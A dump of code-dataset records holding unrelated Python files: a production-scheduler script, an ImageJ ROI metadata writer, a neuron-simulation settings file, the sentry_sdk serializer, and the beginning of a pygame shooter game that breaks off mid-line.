open('downDurationRecords.csv', 'w', newline='\\n') as csv_file:\r\n # writer = csv.writer(csv_file)\r\n # for key, value in original_schedule.downdur_dict.items():\r\n # writer.writerow([key, value[0], value[1]]) \r\n \r\n return total_cost, original_cost, candidate_schedule, original_schedule, lists_result#, lists_result_no_constraint\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n # Read parameters\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"mode\", type=int, help=\"The running mode of the scheduler: 1-User 2-Demo\", default=1)\r\n # TODO: procedures after the user choose mode\r\n parser.add_argument(\"historical_down_periods_file\", help=\"File containing records of historical down duration periods.\") # downDurations.csv\r\n parser.add_argument(\"failure_rate_file\", help=\"File containing failure rate of each hour from the failure model.\") # hourly_failure_rate.csv\r\n parser.add_argument(\"product_related_characteristics_file\", help=\"File containing product related characteristics.\") # productRelatedCharacteristics.csv\r\n parser.add_argument(\"energy_price_file\", help=\"File containing energy price of each hour.\") # price.csv\r\n parser.add_argument(\"job_info_file\", help=\"File containing job information.\") # jobInfoProd_ga_013.csv\r\n parser.add_argument(\"scenario\", type=int, help=\"Choose scenario: 1-MTBF 2-Machine stop/restart\") # number of scenario\r\n parser.add_argument(\"objective\", type=int, help=\"Choose objectives: 1-Energy+Failure 2-Energy Only 3-Failure Only\", default=1) \r\n # TODO: prodedures after the user choose objectives\r\n parser.add_argument(\"pop_size\", type=int, help=\"Population size\") # pupulation size\r\n parser.add_argument(\"generations\", type=int, help=\"Number of generations\")\r\n parser.add_argument(\"crossover_rate\", type=float, help=\"Crossover rate\")\r\n parser.add_argument(\"mutation_rate\", type=float, help=\"Mutation rate\")\r\n args = parser.parse_args()\r\n \r\n# case 1 week\r\n ''' Use start_time and end_time to pick up a waiting job list from records.\r\n Available range: 2016-01-23 17:03:58.780 to 2017-11-15 07:15:20.500\r\n '''\r\n start_time = datetime(2016, 11, 3, 6, 0)\r\n end_time = datetime(2016, 11, 8, 0, 0)\r\n\r\n run_opt(start_time, end_time, args.historical_down_periods_file, \r\n args.failure_rate_file, args.product_related_characteristics_file, \r\n args.energy_price_file, args.job_info_file,\r\n args.scenario, args.generations, args.crossover_rate, args.mutation_rate, args.pop_size)","sub_path":"ELITEPython/Deliverable/SchedulerV000.py","file_name":"SchedulerV000.py","file_ext":"py","file_size_in_byte":41136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"424713834","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 21 09:36:16 2017\n\n@author: mittelberger2\n\"\"\"\n\n#extratags = [(50838, 'I', 2, IJMD.bytecounts, True), (50839, 'B', len(IJMD.metadata), struct.unpack('>'+'B'*len(IJMD.metadata), IJMD.metadata))]\n\nimport struct\nimport numpy as np\n\n# Constants\nHEADER_SIZE = 64\nHEADER2_SIZE = 64\nVERSION = 227\n# Offsets\nVERSION_OFFSET = 4\nTYPE = 6\nTOP = 8\nLEFT = 10\nBOTTOM = 12\nRIGHT = 14\nN_COORDINATES = 16\nX1 = 18\nY1 = 22\nX2 = 26\nY2 = 30\nXD = 18\nYD = 22\nWIDTHD = 26\nHEIGHTD = 30\nSTROKE_WIDTH = 34\nSTROKE_COLOR = 40\nOPTIONS = 50\nHEADER2_OFFSET = 60\nCOORDINATES = 64\n# Options\nSUB_PIXEL_RESOLUTION = 128\n# Types\nroi_types = {\n 'polygon': 0,\n 'rect': 1,\n 'oval': 2,\n 'line': 3,\n 'freeline': 4,\n 'polyline': 5,\n 'noRoi': 6,\n 'freehand': 7,\n 'traced': 8,\n 'angle': 9,\n 'point': 10\n }\n# Field data types\ndtypes = {\n VERSION: '>h',\n TYPE: 'h',\n LEFT: '>h',\n BOTTOM: '>h',\n RIGHT: '>h',\n X1: '>f',\n Y1: '>f',\n X2: '>f',\n Y2: '>f',\n XD: '>f',\n YD: '>f',\n WIDTHD: '>f',\n HEIGHTD: '>f',\n N_COORDINATES: '>h',\n STROKE_WIDTH: '>h',\n STROKE_COLOR: '>3s',\n# OPTIONS: '>h',\n HEADER2_OFFSET: '>i',\n COORDINATES: ('>h', '>f') # save coordinates as 'ints' or 'floats' depending on subpixel_resolution being enabled\n }\n\nclass default_dict(dict):\n def __init__(self, *mapping, **elements):\n super().__init__(*mapping, **elements)\n self._default_value = None\n\n def set_default_value(self, default_value):\n self._default_value = default_value\n\n def __getitem__(self, key):\n if not self.__contains__(key) and self._default_value is not None:\n return self._default_value\n else:\n return super().__getitem__(key)\n\ndtypes = default_dict(dtypes)\ndtypes.set_default_value('>h')\n\nclass IJMetadata(object):\n def __init__(self):\n self._rois = []\n self._overlays = []\n self._labels = []\n self._info = []\n self._luts = []\n self._ranges = []\n self._extras = []\n\n @property\n def bytecounts(self):\n bytecounts = tuple()\n header_size = self.ntypes * 8 + 4\n bytecounts += (header_size,)\n\n for md_type in [self._rois, self._overlays, self._labels, self._info, self._luts, self._ranges, self._extras]:\n for properties in md_type:\n bytecounts += (len(properties['bytestring']),)\n\n return bytecounts\n\n @property\n def metadata(self):\n metadata_bytestring = b'IJIJ'\n if len(self._rois) > 0:\n metadata_bytestring += b'roi ' + struct.pack('>i', len(self._rois))\n if len(self._overlays) > 0:\n metadata_bytestring += b'over' + struct.pack('>i', len(self._overlays))\n if len(self._info) > 0:\n metadata_bytestring += b'info' + struct.pack('>i', len(self._info))\n for extra_tag in self._extras:\n metadata_bytestring += extra_tag['type'] + struct.pack('>i', 1)\n\n for md_type in [self._rois, self._overlays, self._labels, self._info, self._luts, self._ranges, self._extras]:\n for properties in md_type:\n metadata_bytestring += properties['bytestring']\n\n return metadata_bytestring\n\n @property\n def ntypes(self):\n ntypes = 0\n if len(self._rois) > 0:\n ntypes += 1\n if len(self._overlays) > 0:\n ntypes += 1\n if len(self._labels) > 0:\n ntypes += 1\n if len(self._info) > 0:\n ntypes += 1\n if len(self._luts) > 0:\n ntypes += 1\n if len(self._ranges) > 0:\n ntypes += 1\n ntypes += len(self._extras)\n return ntypes\n\n @property\n def tifffile_extratags(self):\n metadata = self.metadata\n return [(50838, 'I', len(self.bytecounts), self.bytecounts, True), (50839, 'B', len(metadata),\n struct.unpack('>'+'B'*len(metadata), metadata))]\n\n def _add_data(self, offset, data):\n assert offset != COORDINATES\n if np.iterable(offset):\n assert len(offset) == len(data)\n else:\n offset = (offset,)\n data = (data,)\n for i in range(len(offset)):\n self.roi_bytes[offset[i]:offset[i]+struct.calcsize(dtypes[offset[i]])] = struct.pack(dtypes[offset[i]],\n data[i])\n\n def _add_roi_or_overlay(self, md_type: str, properties: dict, roi_type='point'):\n \"\"\"\n md_type must be a 4 character imagej type string ('roi ' or 'over')\n \"\"\"\n assert roi_type in roi_types, 'Unknown roi type'\n assert type(properties.get('points')) == list\n npoints = len(properties.get('points'))\n float_size = 0\n roi_name_size = 0\n roi_props_size = 0\n counters_size = 0\n\n if roi_type in ['point', 'rect', 'line', 'oval']:\n properties['subpixel_resolution'] = True\n if roi_type in ['rect', 'oval']:\n assert npoints == 4\n npoints = 0\n if roi_type == 'line':\n assert npoints == 2\n npoints = 0\n\n float_size = npoints*8\n\n self.roi_bytes = bytearray(b'\\x00'*(HEADER_SIZE + HEADER2_SIZE + npoints*4 + float_size + roi_name_size +\n roi_props_size + counters_size))\n\n self.roi_bytes[:4] = b'Iout'\n self._add_data(VERSION_OFFSET, VERSION)\n self._add_data(TYPE, roi_types[roi_type])\n\n points = np.array(properties.get('points'), dtype=np.float32)\n\n top = int(np.amin(points[:, 0]))\n left = int(np.amin(points[:, 1]))\n bottom = int(np.amax(points[:, 0]))\n right = int(np.amax(points[:, 1]))\n if right == left:\n right += 1\n if bottom == top:\n bottom += 1\n self._add_data((TOP, LEFT, BOTTOM, RIGHT), (top, left, bottom, right))\n\n self._add_data(N_COORDINATES, npoints)\n self._add_data(STROKE_WIDTH, 1)\n if md_type == 'over':\n self._add_data(STROKE_COLOR, bytes([255, 255, 255]))\n self._add_data(OPTIONS, SUB_PIXEL_RESOLUTION)\n self._add_data(HEADER2_OFFSET, HEADER_SIZE + 4*npoints + float_size)\n\n if roi_type in ['rect', 'oval']:\n self._add_data(XD, left)\n self._add_data(YD, top)\n self._add_data(HEIGHTD, bottom-top)\n self._add_data(WIDTHD, right-left)\n\n if roi_type == 'line':\n self._add_data(X1, points[0, 1])\n self._add_data(Y1, points[0, 0])\n self._add_data(X2, points[1, 1])\n self._add_data(Y2, points[1, 0])\n\n if npoints > 0:\n if properties.get('subpixel_resolution'):\n coordinates_format = dtypes[COORDINATES][1]\n base1 = COORDINATES + 4*npoints\n base2 = base1 + 4*npoints\n for i in range(npoints):\n self.roi_bytes[base1+4*i:base1+4*i+4] = struct.pack(coordinates_format, points[i, 1])\n self.roi_bytes[base2+4*i:base2+4*i+4] = struct.pack(coordinates_format, points[i, 0])\n else:\n coordinates_format = dtypes[COORDINATES][0]\n base1 = COORDINATES + 2*npoints\n base2 = base1 + 2*npoints\n for i in range(npoints):\n self.roi_bytes[base1+2*i:base1+2*i+2] = struct.pack(coordinates_format, int(points[i, 1]))\n self.roi_bytes[base2+2*i:base2+2*i+2] = struct.pack(coordinates_format, int(points[i, 0]))\n\n properties['bytestring'] = bytes(self.roi_bytes)\n if md_type == 'roi ':\n self._rois.append(properties)\n elif md_type == 'over':\n self._overlays.append(properties)\n else:\n raise ValueError('\"md_type\" must be one of (\"roi \", \"over)')\n\n delattr(self, 'roi_bytes')\n\n def add_roi(self, roi_properties: dict, roi_type='point'):\n \"\"\"\n roi_properties (dict):\n points: list of (y, x) tuples in pixels, MUST be a list even if only one pair of coordinates.\n For a rectangle it must be the four corners of the rectangle, for a line the two endpoints and\n for an oval the corners of the bounding rectangle.\n position: position of roi in a stack (only required for stacks), optional\n subpixel_resolution: True/False, optional\n \"\"\"\n self._add_roi_or_overlay('roi ', roi_properties, roi_type=roi_type)\n\n def add_overlay(self, overlay_properties: dict, overlay_type='point'):\n \"\"\"\n overlay_properties (dict):\n points: list of (y, x) tuples in pixels, MUST be a list even if only one pair of coordinates.\n For a rectangle it must be the four corners of the rectangle, for a line the two endpoints and\n for an oval the corners of the bounding rectangle.\n position: position of overlay in a stack (only required for stacks), optional\n subpixel_resolution: True/False, optional\n \"\"\"\n self._add_roi_or_overlay('over', overlay_properties, roi_type=overlay_type)\n\n def add_labels(self, label_properties: dict):\n raise NotImplementedError\n\n def add_info(self, info_properties: dict):\n \"\"\"\n info_properties (dict):\n text: string that contains the text to write to info tag\n encoding: encoding of the text, optional, defaults to 'ASCII'\n \"\"\"\n\n text = info_properties.get('text')\n encoding = info_properties.get('encoding', 'ASCII')\n if text is None:\n return\n\n info_properties['bytestring'] = struct.pack('>' + 'H'*len(text), *bytes(text, encoding))\n self._info.append(info_properties)\n\n def add_luts(self, luts_properties: dict):\n raise NotImplementedError\n\n def add_ranges(self, ranges_properties: dict):\n raise NotImplementedError\n\n def add_extra_metadata(self, extra_properties: dict):\n \"\"\"\n extra_properties (dict):\n bytes: bytestring that is to be written to tag\n type: string of length 4 that is used in Imagej to identify the metadata type.\n Cannot be one of the predefined types ('info', 'labl', 'rang', 'luts', 'plot', 'over', 'roi ')\n \"\"\"\n md_type = str(extra_properties.get('type', ''))\n assert len(md_type) == 4\n assert md_type not in ('info', 'labl', 'rang', 'luts', 'plot', 'over', 'roi ')\n\n bytestring = extra_properties.get('bytes')\n if bytestring is None:\n return\n\n extra_properties['bytestring'] = bytes(bytestring)\n extra_properties['type'] = bytes(md_type, 'ASCII')\n self._extras.append(extra_properties)","sub_path":"TIFF_IO_ROI/write_ij_metadata.py","file_name":"write_ij_metadata.py","file_ext":"py","file_size_in_byte":11209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"293953371","text":"\n# scenario name for log file\nscenario_name = \"no_vectorization\"\n\n# multiple fibers, new_slow_TK_2014_12_08.c this is the same as cuboid example with ModelType 0 (3a, \"MultiPhysStrain\", old tomo mechanics)\n\nConductivity = 3.828 # sigma, conductivity [mS/cm]\nAm = 500.0 # surface area to volume ratio [cm^-1]\nCm = 0.58 # [uF/cm^2] membrane capacitance, (1 = fast twitch, 0.58 = slow twitch)\n# diffusion prefactor = Conductivity/(Am*Cm)\n\n# timing parameters\n# -----------------\nend_time = 10.0 # [ms] end time of the simulation\nstimulation_frequency = 100*1e-3 # [ms^-1] sampling frequency of stimuli in firing_times_file, in stimulations per ms, number before 1e-3 factor is in Hertz.\ndt_0D = 1e-3 # [ms] timestep width of ODEs\ndt_1D = 1e-3 # [ms] timestep width of diffusion\ndt_splitting = dt_1D # [ms] overall timestep width of strang splitting\noutput_timestep = 0.1 # [ms] timestep for output files\nactivation_start_time = 1 # [ms] time when to start checking for stimulation\n\n# other options\nparaview_output = True\n\nn_fibers_x = 1\nn_fibers_y = 1\nn_points_whole_fiber = 1480\n \n# input files\nfiber_file = \"../../../input/cuboid.bin\"\nfiring_times_file = \"../../../input/MU_firing_times_always.txt\"\nfiber_distribution_file = \"../../../input/MU_fibre_distribution_3780.txt\"\ncellml_file = \"../../../input/new_slow_TK_2014_12_08.c\"\n","sub_path":"examples/electrophysiology/fibers/multiple_fibers_cubes_partitioning/variables/compare_to_opencmiss_no_vectorization.py","file_name":"compare_to_opencmiss_no_vectorization.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382145929","text":"import sys\nimport itertools\n\nfrom datetime import datetime\n\nfrom sentry_sdk.utils import (\n AnnotatedValue,\n capture_internal_exception,\n disable_capture_event,\n safe_repr,\n strip_string,\n)\n\nfrom sentry_sdk._compat import text_type, PY2, string_types, number_types, iteritems\n\nfrom sentry_sdk._types import MYPY\n\nif MYPY:\n from types import TracebackType\n\n import sentry_sdk\n\n from typing import Any\n from typing import Dict\n from typing import List\n from typing import Tuple\n from typing import Optional\n from typing import Callable\n from typing import Union\n from typing import ContextManager\n from typing import Type\n\n from sentry_sdk._types import NotImplementedType, Event\n\n ReprProcessor = Callable[[Any, Dict[str, Any]], Union[NotImplementedType, str]]\n Segment = Union[str, int]\n\n\nif PY2:\n # Importing ABCs from collections is deprecated, and will stop working in 3.8\n # https://github.com/python/cpython/blob/master/Lib/collections/__init__.py#L49\n from collections import Mapping, Sequence\nelse:\n # New in 3.3\n # https://docs.python.org/3/library/collections.abc.html\n from collections.abc import Mapping, Sequence\n\nMAX_DATABAG_DEPTH = 5\nMAX_DATABAG_BREADTH = 10\nCYCLE_MARKER = u\"\"\n\n\nglobal_repr_processors = [] # type: List[ReprProcessor]\n\n\ndef add_global_repr_processor(processor):\n # type: (ReprProcessor) -> None\n global_repr_processors.append(processor)\n\n\nclass Memo(object):\n __slots__ = (\"_inner\", \"_objs\")\n\n def __init__(self):\n # type: () -> None\n self._inner = {} # type: Dict[int, Any]\n self._objs = [] # type: List[Any]\n\n def memoize(self, obj):\n # type: (Any) -> ContextManager[bool]\n self._objs.append(obj)\n return self\n\n def __enter__(self):\n # type: () -> bool\n obj = self._objs[-1]\n if id(obj) in self._inner:\n return True\n else:\n self._inner[id(obj)] = obj\n return False\n\n def __exit__(\n self,\n ty, # type: Optional[Type[BaseException]]\n value, # type: Optional[BaseException]\n tb, # type: Optional[TracebackType]\n ):\n # type: (...) -> None\n self._inner.pop(id(self._objs.pop()), None)\n\n\ndef serialize(event, **kwargs):\n # type: (Event, **Any) -> Event\n memo = Memo()\n path = [] # type: List[Segment]\n meta_stack = [] # type: List[Dict[str, Any]]\n\n def _annotate(**meta):\n # type: (**Any) -> None\n while len(meta_stack) <= len(path):\n try:\n segment = path[len(meta_stack) - 1]\n node = meta_stack[-1].setdefault(text_type(segment), {})\n except IndexError:\n node = {}\n\n meta_stack.append(node)\n\n meta_stack[-1].setdefault(\"\", {}).update(meta)\n\n def _startswith_path(prefix):\n # type: (Tuple[Optional[Segment], ...]) -> bool\n if len(prefix) > len(path):\n return False\n\n for i, segment in enumerate(prefix):\n if segment is None:\n continue\n\n if path[i] != segment:\n return False\n\n return True\n\n def _serialize_node(\n obj, # type: Any\n max_depth=None, # type: Optional[int]\n max_breadth=None, # type: Optional[int]\n is_databag=None, # type: Optional[bool]\n should_repr_strings=None, # type: Optional[bool]\n segment=None, # type: Optional[Segment]\n ):\n # type: (...) -> Any\n if segment is not None:\n path.append(segment)\n\n try:\n with memo.memoize(obj) as result:\n if result:\n return CYCLE_MARKER\n\n return _serialize_node_impl(\n obj,\n max_depth=max_depth,\n max_breadth=max_breadth,\n is_databag=is_databag,\n should_repr_strings=should_repr_strings,\n )\n except BaseException:\n capture_internal_exception(sys.exc_info())\n\n if is_databag:\n return u\"\"\n\n return None\n finally:\n if segment is not None:\n path.pop()\n del meta_stack[len(path) + 1 :]\n\n def _flatten_annotated(obj):\n # type: (Any) -> Any\n if isinstance(obj, AnnotatedValue):\n _annotate(**obj.metadata)\n obj = obj.value\n return obj\n\n def _serialize_node_impl(\n obj, max_depth, max_breadth, is_databag, should_repr_strings\n ):\n # type: (Any, Optional[int], Optional[int], Optional[bool], Optional[bool]) -> Any\n if not should_repr_strings:\n should_repr_strings = (\n _startswith_path(\n (\"exception\", \"values\", None, \"stacktrace\", \"frames\", None, \"vars\")\n )\n or _startswith_path(\n (\"threads\", \"values\", None, \"stacktrace\", \"frames\", None, \"vars\")\n )\n or _startswith_path((\"stacktrace\", \"frames\", None, \"vars\"))\n )\n\n if obj is None or isinstance(obj, (bool, number_types)):\n return obj if not should_repr_strings else safe_repr(obj)\n\n if isinstance(obj, datetime):\n return (\n text_type(obj.strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\"))\n if not should_repr_strings\n else safe_repr(obj)\n )\n\n if not is_databag:\n is_databag = (\n should_repr_strings\n or _startswith_path((\"request\", \"data\"))\n or _startswith_path((\"breadcrumbs\", None))\n or _startswith_path((\"extra\",))\n )\n\n cur_depth = len(path)\n if max_depth is None and max_breadth is None and is_databag:\n max_depth = cur_depth + MAX_DATABAG_DEPTH\n max_breadth = cur_depth + MAX_DATABAG_BREADTH\n\n if max_depth is None:\n remaining_depth = None\n else:\n remaining_depth = max_depth - cur_depth\n\n obj = _flatten_annotated(obj)\n\n if remaining_depth is not None and remaining_depth <= 0:\n _annotate(rem=[[\"!limit\", \"x\"]])\n if is_databag:\n return _flatten_annotated(strip_string(safe_repr(obj)))\n return None\n\n if global_repr_processors and is_databag:\n hints = {\"memo\": memo, \"remaining_depth\": remaining_depth}\n for processor in global_repr_processors:\n result = processor(obj, hints)\n if result is not NotImplemented:\n return _flatten_annotated(result)\n\n if isinstance(obj, Mapping):\n # Create temporary copy here to avoid calling too much code that\n # might mutate our dictionary while we're still iterating over it.\n if max_breadth is not None and len(obj) >= max_breadth:\n rv_dict = dict(itertools.islice(iteritems(obj), None, max_breadth))\n _annotate(len=len(obj))\n else:\n if type(obj) is dict:\n rv_dict = dict(obj)\n else:\n rv_dict = dict(iteritems(obj))\n\n for k in list(rv_dict):\n str_k = text_type(k)\n v = _serialize_node(\n rv_dict.pop(k),\n max_depth=max_depth,\n max_breadth=max_breadth,\n segment=str_k,\n should_repr_strings=should_repr_strings,\n is_databag=is_databag,\n )\n if v is not None:\n rv_dict[str_k] = v\n\n return rv_dict\n elif not isinstance(obj, string_types) and isinstance(obj, Sequence):\n if max_breadth is not None and len(obj) >= max_breadth:\n rv_list = list(obj)[:max_breadth]\n _annotate(len=len(obj))\n else:\n rv_list = list(obj)\n\n for i in range(len(rv_list)):\n rv_list[i] = _serialize_node(\n rv_list[i],\n max_depth=max_depth,\n max_breadth=max_breadth,\n segment=i,\n should_repr_strings=should_repr_strings,\n is_databag=is_databag,\n )\n\n return rv_list\n\n if should_repr_strings:\n obj = safe_repr(obj)\n else:\n if isinstance(obj, bytes):\n obj = obj.decode(\"utf-8\", \"replace\")\n\n if not isinstance(obj, string_types):\n obj = safe_repr(obj)\n\n return _flatten_annotated(strip_string(obj))\n\n disable_capture_event.set(True)\n try:\n rv = _serialize_node(event, **kwargs)\n if meta_stack and isinstance(rv, dict):\n rv[\"_meta\"] = meta_stack[0]\n return rv\n finally:\n disable_capture_event.set(False)\n\n\ndef partial_serialize(client, data, should_repr_strings=True, is_databag=True):\n # type: (Optional[sentry_sdk.Client], Any, bool, bool) -> Any\n is_recursive = disable_capture_event.get(None)\n if is_recursive:\n return CYCLE_MARKER\n\n if client is not None and client.options[\"_experiments\"].get(\n \"fast_serialize\", False\n ):\n data = serialize(\n data, should_repr_strings=should_repr_strings, is_databag=is_databag\n )\n\n if isinstance(data, dict):\n # TODO: Bring back _meta annotations\n data.pop(\"_meta\", None)\n return data\n\n return data\n","sub_path":"sentry_sdk/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":9666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"431724458","text":"import random, sys, math, time\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\nlast_preset = []\r\ngame_height = 800\r\ngame_width = 1400\r\nfps = 60\r\nname = 'Sadistic Stars'\r\nscreen = pygame.display.set_mode((game_width, game_height))\r\nclock = pygame.time.Clock()\r\npygame.display.set_caption(name)\r\nprogramIcon = pygame.image.load('icon.png')\r\npygame.display.set_icon(programIcon)\r\n\r\n\r\n\r\n\r\n#game variables\r\ndef set_variables():\r\n global debugging_mode, game_on, game_height, game_width, fps, name, screen_colour\r\n global events, mouse_x, mouse_y, drift_speed, running, edges, bad_bullets, good_bullets\r\n global good_guys, bad_guys, effects, balls, explosions, bullets, map_count, map_image\r\n global waves, wave_done, wave_to_do_list, players_to_make, skin_l, gun_l, controls_l, players_l\r\n global options, wave_count, scrolling_background, tim_stats, lill_tim_stats, lill_tim2_stats, bob_stats\r\n global bob_body_stats, player_stats, explosion_stats, game_ready, game_started, fg, bg, load_stage\r\n global preset, start_cycle, cross_out, which, last_clicked, check_mark, last_clicked2, last_clicked3\r\n global death_counts, cross_out2, progress, wave_timer1, wave_timer2, game_over_timer, sgt, death\r\n global damage, kills, hours, minutes, seconds, wave, counting, time_outs, time_out_time, boss_to_do_list\r\n global boss_tim_stats, bombs, bomb_stats\r\n boss_to_do_list = []\r\n time_out_time = 1\r\n time_outs = []\r\n counting = False\r\n progress = 1\r\n wave = -1\r\n damage = 0\r\n kills = 0\r\n hours = 0\r\n minutes = 0\r\n seconds = 0\r\n death_counts = False\r\n last_clicked = None\r\n last_clicked2 = None\r\n last_clicked3 = None\r\n preset = []\r\n which = 0\r\n load_stage = 1\r\n fg = 250, 240, 230\r\n bg = 5, 5, 5\r\n cross_out = pygame.image.load('cross_out.png')\r\n cross_out2 = pygame.image.load('cross_out2.png')\r\n check_mark = pygame.image.load('check_mark.png')\r\n game_started = False\r\n map_image = pygame.transform.scale(pygame.image.load('stars.png'), (int(pygame.image.load('stars.png').get_width() * 2.3), int(pygame.image.load('stars.png').get_height() * 2.3)))\r\n game_ready = False\r\n debugging_mode = True\r\n game_on = False\r\n screen_colour = (200, 200, 200)\r\n events = []\r\n mouse_x = 0\r\n mouse_y = 0\r\n drift_speed = 2\r\n running = True\r\n edges = [750,0,1365,0]\r\n bad_bullets = []\r\n good_bullets = []\r\n good_guys = []\r\n bad_guys = []\r\n effects = []\r\n bombs = []\r\n balls = []\r\n default_wait_wave = 5\r\n explosions = []\r\n start_cycle = True\r\n # ID : [IMAGE, AIM ANGLE FLUCTUATION, TICKS BETWEEN SHOT, DAMAGE]\r\n bullets = {1 : ['bullet1.png', 3, 10, 8, 3],\r\n 2 : ['bullet2.png', 20, 7, 3, .7],\r\n 3 : ['bullet3.png', 0, 30, 60, 10],\r\n 4 : ['bullet4.png', 40, 7, 120, 2]}\r\n map_count = 0\r\n # ID : [TICKS BETWEEN SPAWN, SECONDS TO WAIT, LILL_TIMS, LILL_TIMS2, TIMS, BOMBS, BOBS]\r\n waves = {1 : [30, 0,0, 0, 0, 0, 0, 'boss_tim'],\r\n 2 : [20, default_wait_wave, 40, 0, 0, 0, 0, None],\r\n 3 : [10, default_wait_wave, 100, 0, 0, 0, 0, None],\r\n 4 : [20, default_wait_wave, 60, 15, 0, 0, 0, None],\r\n 5 : [12, default_wait_wave, 50, 25, 0, 0, 0, None],\r\n 6 : [8, default_wait_wave, 80, 60, 0, 1, 0, None],\r\n 7 : [16, default_wait_wave, 20, 60, 0, 10, 0, None],\r\n 8 : [12, default_wait_wave, 30, 10, 1, 1, 0, None],\r\n 9 : [16, default_wait_wave, 60, 30, 2, 4, 4, None],\r\n 10 : [16, default_wait_wave, 60, 30, 5, 4, 4, None],\r\n 11 : [16, default_wait_wave, 50, 50, 10, 4, 4, None],\r\n 12 : [20, default_wait_wave, 60, 60, 15, 4, 4, 'boss_tim']}\r\n\r\n\r\n wave_done = True\r\n wave_to_do_list = []\r\n players_to_make = []\r\n skin_l = [1,2,3,4]\r\n gun_l = [1,2,3,4]\r\n controls_l = ['wasd', 'arrow', 'ijkl', 'tfgh']\r\n players_l = [1,2,3,4]\r\n options = True\r\n wave_count = 0\r\n scrolling_background = True\r\n\r\n tim_stats = {'image1' : pygame.image.load('tim.png'),\r\n 'image2' : pygame.image.load('tim2.png'),\r\n 'health' : 10,\r\n 'speed' : 1,\r\n 'pitch' : 3,\r\n 'roll' : .025,\r\n 'shoot_rate' : 120,\r\n 'costume_rate' : 10}\r\n\r\n lill_tim_stats = {'image1' : pygame.image.load('lill_tim.png'),\r\n 'image2' : pygame.image.load('lill_tim2.png'),\r\n 'health' : 3,\r\n 'speed' : 1,\r\n 'pitch' : None,\r\n 'roll' : None,\r\n 'costume_rate' : 10}\r\n bomb_stats = {'image1' : pygame.image.load('mine.png'),\r\n 'image2' : pygame.image.load('mine2.png'),\r\n 'image3' : pygame.image.load('mine3.png'),\r\n 'image4' : pygame.image.load('explosion2.png'),\r\n 'health' : 5,\r\n 'speed' : 1,\r\n 'range' : 200}\r\n \r\n\r\n lill_tim2_stats = {'image1' : pygame.image.load('lill_tim-2.png'),\r\n 'image2' : pygame.image.load('lill_tim2-2.png'),\r\n 'health' : 5,\r\n 'speed' : 1,\r\n 'pitch' : 3,\r\n 'roll' : .025,\r\n 'costume_rate' : 10}\r\n\r\n bob_stats = {'image1' : pygame.image.load('worm_head1.png'),\r\n 'image2' : pygame.image.load('worm_head2.png'),\r\n 'health' : 5,\r\n 'speed' : 3,\r\n 'pitch' : 3,\r\n 'roll' : .010,\r\n 'costume_rate' : 10,\r\n 'distance' : 5,\r\n 'length' : 200}\r\n\r\n bob_body_stats = {'image1' : pygame.image.load('worm_body.png')}\r\n \r\n player_stats = {'speed' : 8,\r\n 'costume_rate' : 10,\r\n 'controls' : {'wasd' : ['w','s','a','d'],\r\n 'tfgh' : ['t','g','f','h'],\r\n 'ijkl' : ['i','k','j','l'],\r\n 'arrow' : ['up','down','left','right']},\r\n 'shotgun_count' : 12,\r\n 'skins' : {1 : [pygame.image.load('player1-1.png'),pygame.image.load('player1-2.png')],\r\n 2 : [pygame.image.load('player2-1.png'),pygame.image.load('player2-2.png')],\r\n 3 : [pygame.image.load('player3-1.png'),pygame.image.load('player3-2.png')],\r\n 4 : [pygame.image.load('player4-1.png'),pygame.image.load('player4-2.png')]}}\r\n\r\n explosion_stats = {'image1' : pygame.image.load('explosion.png'),\r\n 'length' : 15}\r\n boss_tim_stats = {'image1' : pygame.image.load('boss_tim1.png'),\r\n 'image3' : pygame.image.load('progress bar.png'),\r\n 'image4' : pygame.image.load('progress_bar2.png'),\r\n 'image2' : pygame.image.load('boss_tim2.png'),\r\n 'image5' : pygame.image.load('progress_bar3.png'),\r\n 'health' : 1200,\r\n 'costume_rate' : 10,\r\n 'x' : 700,\r\n 'y' : -300,\r\n 'fall_speed' : 1,\r\n 'home' : [700, 100]}\r\n \r\n\r\n #timers\r\n wave_timer1 = count()\r\n wave_timer2 = count()\r\n game_over_timer = count()\r\n sgt = count()\r\n death = count()\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n#classes\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass bomb(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y):\r\n self.health = bomb_stats['health']\r\n self.x = x\r\n self.y = y\r\n self.speed = bomb_stats['speed']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = bomb_stats['image1']\r\n self.image2 = bomb_stats['image2']\r\n self.image3 = bomb_stats['image3']\r\n self.image4 = bomb_stats['image4']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.costume = 0\r\n self.scale = 0\r\n self.triggered = False\r\n self.origin = [x,y]\r\n\r\n def trigger(self):\r\n self.triggered = True\r\n \r\n def boom(self):\r\n if self.d.count_loop(10):\r\n self.costume += 1\r\n if self.costume == 1:\r\n self.chosen_image = self.image2\r\n elif self.costume == 2:\r\n self.chosen_image = self.image3\r\n if self.costume >= 3:\r\n self.chosen_image = self.image3\r\n self.scale += 1\r\n scale_factor = self.scale / 10\r\n new_width = int(self.image4.get_width() * scale_factor)\r\n new_height = int(self.image4.get_height() * scale_factor)\r\n self.chosen_image = pygame.transform.scale(self.image4, (new_width, new_height))\r\n if self.scale == 50:\r\n bombs.remove(self)\r\n kill()\r\n \r\n \r\n\r\n def hit(self, dam):\r\n if self.health <= 0:\r\n self.triggered = True\r\n print('damage %s' % dam)\r\n print(self.health)\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n self.trigger()\r\n\r\n \r\n\r\n def loop(self):\r\n if self.y >= 1000:\r\n wave_to_do_list.append('bomb')\r\n bombs.remove(self)\r\n if self.triggered:\r\n self.boom()\r\n self.y 